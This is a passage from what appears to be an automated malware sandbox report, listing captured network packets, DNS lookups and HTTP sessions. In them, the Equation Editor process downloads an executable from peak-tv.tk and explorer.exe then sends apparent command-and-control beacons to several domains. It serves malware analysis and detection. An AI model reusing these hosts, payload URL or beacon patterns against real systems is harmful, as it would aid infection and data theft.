Jan 13, 2022 18:17:00.377583027 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377585888 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377588987 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377602100 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377610922 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377619028 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377629042 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377635002 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377636909 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377650976 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377654076 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377666950 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377671957 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377684116 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377690077 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377700090 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377707005 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377717018 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377722979 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377732992 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377738953 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377749920 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377756119 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377765894 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377774000 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377782106 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377789021 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377798080 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377806902 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377815008 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377825975 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377835035 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377863884 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377890110 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377912045 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377928019 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377933979 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377944946 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377952099 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377964020 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377966881 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.377980947 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.377988100 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378000021 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378005981 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378016949 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378021002 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378034115 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378040075 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378051043 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378055096 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378067970 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378072977 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378091097 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378092051 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378108025 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378110886 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378124952 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378129005 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378146887 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378148079 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378164053 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378165007 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378180981 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378181934 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378196955 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378199100 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378215075 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378216982 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378230095 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378232002 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378248930 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378251076 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378267050 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378267050 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378283978 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378283978 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378300905 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378307104 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378317118 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378333092 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378334999 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378349066 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378356934 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378360033 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378365993 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378371954 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378381968 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378390074 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378396988 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.378407001 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378424883 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378895998 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.378906012 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.405983925 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406018972 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406033993 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406050920 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406069040 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406085014 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406100988 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406119108 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406141996 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406158924 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406158924 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406176090 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406181097 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406183958 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406186104 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406187057 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406188965 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406192064 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406192064 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406194925 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406208992 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406224966 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406227112 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406241894 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406240940 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406259060 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406264067 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406267881 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406270027 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406275034 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406275988 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406291962 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406301022 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406305075 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406306982 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406318903 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406322956 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406337976 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406339884 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406342983 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406357050 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406359911 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406373978 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406375885 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406393051 CET  80       49167    2.58.149.41     192.168.2.22
Jan 13, 2022 18:17:00.406394005 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406419039 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.406480074 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.407536030 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:00.409226894 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:17:01.238079071 CET  49167    80       192.168.2.22    2.58.149.41
Jan 13, 2022 18:18:34.709387064 CET  49168    80       192.168.2.22    23.227.38.74
Jan 13, 2022 18:18:34.728159904 CET  80       49168    23.227.38.74    192.168.2.22
Jan 13, 2022 18:18:34.728283882 CET  49168    80       192.168.2.22    23.227.38.74
Jan 13, 2022 18:18:34.728436947 CET  49168    80       192.168.2.22    23.227.38.74
Jan 13, 2022 18:18:34.746195078 CET  80       49168    23.227.38.74    192.168.2.22
Jan 13, 2022 18:18:34.850775003 CET  80       49168    23.227.38.74    192.168.2.22
Jan 13, 2022 18:18:34.850833893 CET  80       49168    23.227.38.74    192.168.2.22
Jan 13, 2022 18:18:34.850872040 CET  80       49168    23.227.38.74    192.168.2.22
Jan 13, 2022 18:18:34.850908041 CET  80       49168    23.227.38.74    192.168.2.22
Jan 13, 2022 18:18:34.850936890 CET  80       49168    23.227.38.74    192.168.2.22
Jan 13, 2022 18:18:34.850960016 CET  80       49168    23.227.38.74    192.168.2.22
Jan 13, 2022 18:18:34.850955963 CET  49168    80       192.168.2.22    23.227.38.74
Jan 13, 2022 18:18:34.850986004 CET  80       49168    23.227.38.74    192.168.2.22
Jan 13, 2022 18:18:34.850987911 CET  49168    80       192.168.2.22    23.227.38.74
Jan 13, 2022 18:18:34.851038933 CET  49168    80       192.168.2.22    23.227.38.74
Jan 13, 2022 18:18:34.851058006 CET  49168    80       192.168.2.22    23.227.38.74
Jan 13, 2022 18:18:34.851144075 CET  49168    80       192.168.2.22    23.227.38.74
Jan 13, 2022 18:18:53.485584974 CET  49170    80       192.168.2.22    34.102.136.180
Jan 13, 2022 18:18:53.504618883 CET  80       49170    34.102.136.180  192.168.2.22
Jan 13, 2022 18:18:53.504718065 CET  49170    80       192.168.2.22    34.102.136.180
Jan 13, 2022 18:18:53.504982948 CET  49170    80       192.168.2.22    34.102.136.180
Jan 13, 2022 18:18:53.523961067 CET  80       49170    34.102.136.180  192.168.2.22
Jan 13, 2022 18:18:53.620393038 CET  80       49170    34.102.136.180  192.168.2.22
Jan 13, 2022 18:18:53.620409966 CET  80       49170    34.102.136.180  192.168.2.22
Jan 13, 2022 18:18:53.620588064 CET  49170    80       192.168.2.22    34.102.136.180
Jan 13, 2022 18:18:53.620749950 CET  49170    80       192.168.2.22    34.102.136.180
Jan 13, 2022 18:18:53.639607906 CET  80       49170    34.102.136.180  192.168.2.22
Jan 13, 2022 18:18:58.768819094 CET  49171    80       192.168.2.22    109.94.209.123
Jan 13, 2022 18:18:58.848622084 CET  80       49171    109.94.209.123  192.168.2.22
Jan 13, 2022 18:18:58.848798037 CET  49171    80       192.168.2.22    109.94.209.123
Jan 13, 2022 18:18:58.849119902 CET  49171    80       192.168.2.22    109.94.209.123
Jan 13, 2022 18:18:58.928078890 CET  80       49171    109.94.209.123  192.168.2.22
Jan 13, 2022 18:18:58.928126097 CET  80       49171    109.94.209.123  192.168.2.22
Jan 13, 2022 18:18:58.928153038 CET  80       49171    109.94.209.123  192.168.2.22
Jan 13, 2022 18:18:58.928354979 CET  49171    80       192.168.2.22    109.94.209.123
Jan 13, 2022 18:18:58.928443909 CET  49171    80       192.168.2.22    109.94.209.123
Jan 13, 2022 18:18:59.001502037 CET  80       49171    109.94.209.123  192.168.2.22
Jan 13, 2022 18:19:03.976763964 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:03.995702028 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:03.995799065 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:03.995932102 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:04.014612913 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058167934 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058192015 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058206081 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058223963 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058233976 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058247089 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058264017 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058280945 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058293104 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058305979 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058319092 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058331966 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058343887 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.058370113 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:04.058398962 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:04.058418036 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:04.058425903 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:04.058438063 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:04.058450937 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:04.058454037 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:04.058464050 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:04.058466911 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:04.058571100 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:04.077091932 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.077117920 CET  80       49172    91.195.240.13   192.168.2.22
Jan 13, 2022 18:19:04.077178001 CET  49172    80       192.168.2.22    91.195.240.13
Jan 13, 2022 18:19:04.078180075 CET  49172    80       192.168.2.22    91.195.240.13

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2022 18:17:00.061178923 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 18:17:00.109055042 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 18:18:34.665961027 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 18:18:34.698467016 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 18:18:53.462610960 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 18:18:53.484441042 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 18:18:58.635457993 CET | 59030 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 18:18:58.766792059 CET | 53 | 59030 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 18:19:03.935352087 CET | 59185 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 18:19:03.973486900 CET | 53 | 59185 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 18:19:09.561289072 CET | 55616 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 18:19:09.586139917 CET | 53 | 55616 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 13, 2022 18:17:00.061178923 CET | 192.168.2.22 | 8.8.8.8 | 0x65b0 | Standard query (0) | peak-tv.tk | A (IP address) | IN (0x0001)
Jan 13, 2022 18:18:34.665961027 CET | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.prestigiousuniforms.com | A (IP address) | IN (0x0001)
Jan 13, 2022 18:18:53.462610960 CET | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.muzicalbox.com | A (IP address) | IN (0x0001)
Jan 13, 2022 18:18:58.635457993 CET | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.extraordinarymiracle.com | A (IP address) | IN (0x0001)
Jan 13, 2022 18:19:03.935352087 CET | 192.168.2.22 | 8.8.8.8 | 0x9037 | Standard query (0) | www.realstakepool.com | A (IP address) | IN (0x0001)
Jan 13, 2022 18:19:09.561289072 CET | 192.168.2.22 | 8.8.8.8 | 0xce43 | Standard query (0) | www.danielkcarter.store | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 13, 2022 18:17:00.109055042 CET | 8.8.8.8 | 192.168.2.22 | 0x65b0 | No error (0) | peak-tv.tk | | 2.58.149.41 | A (IP address) | IN (0x0001)
Jan 13, 2022 18:18:34.698467016 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | www.prestigiousuniforms.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2022 18:18:34.698467016 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001)
Jan 13, 2022 18:18:53.484441042 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.muzicalbox.com | muzicalbox.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2022 18:18:53.484441042 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | muzicalbox.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jan 13, 2022 18:18:58.766792059 CET | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.extraordinarymiracle.com | | 109.94.209.123 | A (IP address) | IN (0x0001)
Jan 13, 2022 18:19:03.973486900 CET | 8.8.8.8 | 192.168.2.22 | 0x9037 | No error (0) | www.realstakepool.com | | 91.195.240.13 | A (IP address) | IN (0x0001)
Jan 13, 2022 18:19:09.586139917 CET | 8.8.8.8 | 192.168.2.22 | 0xce43 | No error (0) | www.danielkcarter.store | | 172.67.181.75 | A (IP address) | IN (0x0001)
Jan 13, 2022 18:19:09.586139917 CET | 8.8.8.8 | 192.168.2.22 | 0xce43 | No error (0) | www.danielkcarter.store | | 104.21.83.204 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• peak-tv.tk
• www.prestigiousuniforms.com
• www.muzicalbox.com
• www.extraordinarymiracle.com
• www.realstakepool.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 2.58.149.41 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2022 18:17:00.157764912 CET | 0 | OUT | GET /medicomzx.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: peak-tv.tk
Connection: Keep-Alive
Jan 13, 2022 18:17:00.184818029 CET | 2 | IN | HTTP/1.1 200 OK
Date: Thu, 13 Jan 2022 17:17:00 GMT
Server: Apache
Last-Modified: Tue, 11 Jan 2022 16:19:34 GMT
ETag: "aca00-5d550d19904c2"
Accept-Ranges: bytes
Content-Length: 707072
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2022 18:18:34.728436947 CET | 749 | OUT | GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1
Host: www.prestigiousuniforms.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2022 18:18:34.850775003 CET | 750 | IN | HTTP/1.1 403 Forbidden
Date: Thu, 13 Jan 2022 17:18:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Sorting-Hat-PodId: 179
X-Sorting-Hat-ShopId: 59690647732
X-Dc: gcp-europe-west1
X-Request-ID: e3e3ac4d-8382-4b00-a294-d0a023d81b81
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 1; mode=block
X-Download-Options: noopen
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 6cd048db19b64333-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49170 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2022 18:18:53.504982948 CET | 755 | OUT | GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1
Host: www.muzicalbox.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2022 18:18:53.620393038 CET | 756 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 13 Jan 2022 17:18:53 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6192576d-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49171 | 109.94.209.123 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2022 18:18:58.849119902 CET | 757 | OUT | GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1
Host: www.extraordinarymiracle.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2022 18:18:58.928126097 CET | 757 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.20.1
Date: Thu, 13 Jan 2022 17:18:58 GMT
Content-Type: text/html
Content-Length: 169
Connection: close
Location: https://www.extraordinarymiracle.com:443/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49172 | 91.195.240.13 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2022 18:19:03.995932102 CET | 758 | OUT | GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.realstakepool.com
